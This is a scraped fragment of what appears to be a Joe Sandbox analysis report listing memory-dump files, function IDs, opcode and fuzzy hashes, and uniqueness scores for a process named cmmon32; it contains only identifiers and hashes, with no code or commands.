                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: +$-
                                                                                                  • API String ID: 1302938615-2137968064
                                                                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                  • Instruction ID: 9caeba7805b753a3de68b2836ffaf12169476e868355c7fe47a4d4354aa62971
                                                                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                  • Instruction Fuzzy Hash: 61918570E022269BDF24DF6BC8916BEB7A5FF84720F54651AE855E72C0E730F9428760
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3796675723.0000000004370000.00000040.00001000.00020000.00000000.sdmp, Offset: 04370000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3796675723.0000000004499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000449D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3796675723.000000000450E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_4370000_cmmon32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $$@
                                                                                                  • API String ID: 0-1194432280
                                                                                                  • Opcode ID: eca10968d3fe48b3be82bb59b6dc329bc7ca367b76158c704ddfbe4fd65a023b
                                                                                                  • Instruction ID: 0e8e97a28ddeeb1ea8b2866876c68d69a7f1331fdec17591dcf0c8b21cca75c7
                                                                                                  • Opcode Fuzzy Hash: eca10968d3fe48b3be82bb59b6dc329bc7ca367b76158c704ddfbe4fd65a023b
                                                                                                  • Instruction Fuzzy Hash: 9B811DB1D002699BDB358B54CC48BEAB6B4AF48714F0045EAA919B7680D770AE95CFA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%